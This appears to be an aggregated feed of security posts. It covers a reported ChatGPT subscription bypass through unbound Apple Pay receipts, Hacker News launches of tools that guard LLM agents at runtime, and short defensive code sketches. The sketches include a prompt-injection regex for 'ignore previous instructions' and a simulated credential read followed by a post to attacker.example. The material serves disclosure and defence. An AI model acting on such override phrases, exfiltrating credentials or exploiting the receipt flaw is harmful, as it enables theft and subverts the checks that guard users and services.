OpenAI Developer Community – 17 Apr 26 [Security Report] Apple Pay receipt validation does not bind to purchaser Apple ID – potential subscription bypass - ChatGPT / Bugs - OpenAI Developer Community ⚠ Disclaimer: This report is for technical research and responsible disclosure purposes only. I do not endorse or encourage any unauthorized use, account sharing, or commercial exploitation of this finding. All testing was conducted on accounts I... (1 post, 1 participant)
The insiders are panicking: [Security Report] Apple Pay receipt validation does not bind to purchaser Apple ID – potential subscription bypass - ChatGPT / Bugs - OpenAI Developer Community (25 posts, 21 participants)
No idea who submitted the vulnerability to OpenAI officially, but now nobody gets to play anymore. Speechless. Below is the submitted report: [Security Report] Apple Pay receipt validation does not bind to purchaser Apple ID – potential subscription bypass - Bugs - OpenAI Developer Community. There is also a link to a linux.do address. Those people out there charging thousands to teach "GPT recharge-on-behalf techniques" are teaching exactly these steps; see the fully public technical write-up of the GPT Plus Turkey loophole (availability unverified). (21 posts, 14 participants)
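The report's core claim is that the backend verifies a receipt is genuine but never checks who bought it. A minimal sketch of the missing binding step, assuming a StoreKit 2-style `appAccountToken` field; the transaction dict and function names here are illustrative, not Apple's actual response format or the vendor's real code:

```python
# Hypothetical sketch of the missing server-side binding check described in
# the report. Field names (app_account_token, product_id) follow StoreKit 2
# conventions, but this transaction dict is illustrative only.

def grant_entitlement(transaction: dict, requesting_user_token: str) -> bool:
    """Return True only if the verified transaction is bound to the requester."""
    # Step 1 (where the vulnerable flow stops): the receipt is cryptographically
    # valid and the product matches.
    if transaction.get("product_id") != "plus_monthly":
        return False
    # Step 2 (the missing check): bind the purchase to the purchaser. Without
    # this, one valid receipt can unlock subscriptions on arbitrary accounts.
    return transaction.get("app_account_token") == requesting_user_token

# One valid receipt, two different accounts:
tx = {"product_id": "plus_monthly", "app_account_token": "user-a"}
print(grant_entitlement(tx, "user-a"))  # purchaser's own account: granted
print(grant_entitlement(tx, "user-b"))  # replayed receipt: rejected
```

Skipping step 2 is exactly the subscription-bypass scenario the report describes: any account presenting a captured valid receipt gets the entitlement.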
Hi HN, I've been working on an open-source project to explore a problem I keep running into with LLM systems in production: we give models the ability to call tools, access data, and make decisions, but we don't have a real runtime security layer around them. So I built a system that acts as a control plane for AI behavior, not just infrastructure.

GitHub: https://github.com/dshapi/AI-SPM

What it does

The system sits around an LLM pipeline and enforces decisions in real time:
- Detects and blocks prompt injection (including obfuscation attempts)
- Forces structured tool calls (no direct execution from the model)
- Validates tool usage against policies
- Prevents data leakage (PII / sensitive outputs)
- Streams all activity for detection + audit

Architecture (high-level)
- Gateway layer for request control
- Context inspection (prompt analysis + normalization)
- Policy engine (using Open Policy Agent)
- Runtime enforcement (tool validation + sandboxing)
- Streaming pipeline (Apache Kafka + Apache Flink)
- Output filtering before the response leaves the system

The key idea: treat the LLM as untrusted, and enforce everything externally.

What broke during testing

Some things that surprised me:
- Simple pattern-based prompt injection detection is easy to bypass
- Obfuscated inputs (base64, Unicode tricks) are much more common than expected
- Tool misuse is the biggest real risk (not the model itself)
- Most "guardrails" don't actually enforce anything at runtime

What I'm unsure about

Would really appreciate feedback from people who've worked on similar systems:
- Is a general-purpose policy engine like OPA the right abstraction here?
- How are people handling prompt injection detection beyond heuristics?
- Where should enforcement actually live (gateway vs. execution layer)?
- What am I missing in terms of attack surface?

Why I'm sharing

This space feels underdeveloped compared to traditional security. We have CSPM, KSPM, etc., but nothing equivalent for AI systems yet.
Trying to explore what that should look like in practice. Would love any feedback — especially critical takes. Comments URL: https://news.ycombinator.com/item?id=47799856 Points: 1 # Comments: 0
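The post's point that obfuscated inputs (base64, Unicode tricks) slip past pattern-only filters can be sketched as a normalize-then-match pass. This is an illustrative sketch, not AI-SPM's actual code; the pattern list and helper names are assumptions:

```python
# Minimal sketch of why pattern-only prompt-injection filters miss obfuscated
# inputs: fold Unicode lookalikes and decode embedded base64 *before* matching.
import base64
import re
import unicodedata

# Hypothetical pattern list; a real system would use many signals, not one regex.
INJECTION_PATTERNS = [re.compile(r"ignore (all )?previous instructions", re.I)]

def normalize(text: str) -> str:
    """Fold Unicode lookalikes (NFKC) and decode base64-looking runs."""
    text = unicodedata.normalize("NFKC", text)

    def try_decode(m: re.Match) -> str:
        try:
            return base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except Exception:
            return m.group(0)  # not valid base64/UTF-8: leave it alone

    # Opportunistically decode long base64-shaped runs back into text.
    return re.sub(r"[A-Za-z0-9+/]{16,}={0,2}", try_decode, text)

def looks_injected(text: str) -> bool:
    t = normalize(text)
    return any(p.search(t) for p in INJECTION_PATTERNS)

payload = base64.b64encode(b"ignore previous instructions").decode()
print(looks_injected(payload))  # True: caught only after base64 decoding
print(looks_injected("\U0001d5c2gnore previous instructions"))  # True: NFKC folds the lookalike "i"
```

Matching the raw string would miss both inputs, which is the "easy to bypass" failure mode the post describes.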
Article URL: https://safeweave.dev Comments URL: https://news.ycombinator.com/item?id=47779508 Points: 1 # Comments: 0
Article URL: https://atticsecurity.com/en/blog/why-llms-hate-fake-data-token-proxy/ Comments URL: https://news.ycombinator.com/item?id=47778087 Points: 2 # Comments: 2
Article URL: https://www.strix.ai/blog/pentesting-every-pull-request Comments URL: https://news.ycombinator.com/item?id=47771386 Points: 2 # Comments: 0
Article URL: https://github.com/cloudwatcher-dev/cloudwatcher-aws-cloudformation Comments URL: https://news.ycombinator.com/item?id=47770486 Points: 1 # Comments: 0
Article URL: https://agentgraph.co/check Comments URL: https://news.ycombinator.com/item?id=47767201 Points: 2 # Comments: 0
We use Claude Code, Cursor, and Copilot daily. These tools run shell commands, read files, and call APIs on their own. When something goes wrong, you find out after: a .env file gets read, a secret ends up somewhere it should not, a command runs that nobody approved. EDR sees process spawns. Cloud audit logs see API calls. Neither understands that the agent's chain of actions, taken together, is credential theft.

Burrow sits between the agent and the machine. You define policies in plain language, like "block any agent from deleting production resources" or "alert if an agent reads AWS credentials and then sends data to an external endpoint." Burrow maps those policies against the actual tools, MCP servers, and plugins in your environment, then intercepts tool calls at the framework level before they execute. Risky calls get dropped. Everything else passes through.

Works with Claude Code, Cursor, Copilot, Windsurf, CrewAI, LangChain, LangGraph, and a few more. CLI and SDK install in under a minute. Free tier for individuals, paid for teams.

I ran infrastructure security at a large media company before this. Going full time on Burrow later this month. Happy to answer anything, especially the "does this actually work in production" question.

Try it: https://burrow.run

Comments URL: https://news.ycombinator.com/item?id=47761957 Points: 3 # Comments: 0
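The two example policies in the Burrow description, a hard block and a sequence-based alert, can be sketched as a stateful interceptor sitting in front of the agent's tool calls. The class and rule names here are assumptions for illustration, not Burrow's real API:

```python
# Illustrative sketch of framework-level tool-call interception: one rule
# drops a call outright, the other correlates a sequence (credential read
# followed by outbound traffic) that neither EDR nor audit logs would flag.
from dataclasses import dataclass, field

@dataclass
class ToolCall:
    tool: str  # e.g. "read_file", "http_post", "delete_resource"
    arg: str   # path, URL, or resource name

@dataclass
class PolicyEngine:
    saw_credential_read: bool = False
    alerts: list = field(default_factory=list)

    def check(self, call: ToolCall) -> bool:
        """Return True to let the call execute, False to drop it."""
        # Policy 1: "block any agent from deleting production resources."
        if call.tool == "delete_resource" and "prod" in call.arg:
            return False
        # Policy 2: "alert if an agent reads AWS credentials and then
        # sends data to an external endpoint."
        if call.tool == "read_file" and ".aws/credentials" in call.arg:
            self.saw_credential_read = True
        if call.tool == "http_post" and self.saw_credential_read:
            self.alerts.append(f"possible exfiltration to {call.arg}")
        return True

engine = PolicyEngine()
print(engine.check(ToolCall("delete_resource", "prod-db-1")))  # False: dropped
engine.check(ToolCall("read_file", "/home/me/.aws/credentials"))
engine.check(ToolCall("http_post", "https://attacker.example"))
print(engine.alerts)  # the chained actions trigger the alert
```

The point of the sketch is the statefulness: each call looks benign in isolation, and only an interceptor that remembers the earlier credential read can flag the later outbound call.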
Article URL: https://tools.examineip.com/ Comments URL: https://news.ycombinator.com/item?id=47749285 Points: 1 # Comments: 0
Article URL: https://github.com/TheDen/ghapin Comments URL: https://news.ycombinator.com/item?id=47739132 Points: 2 # Comments: 0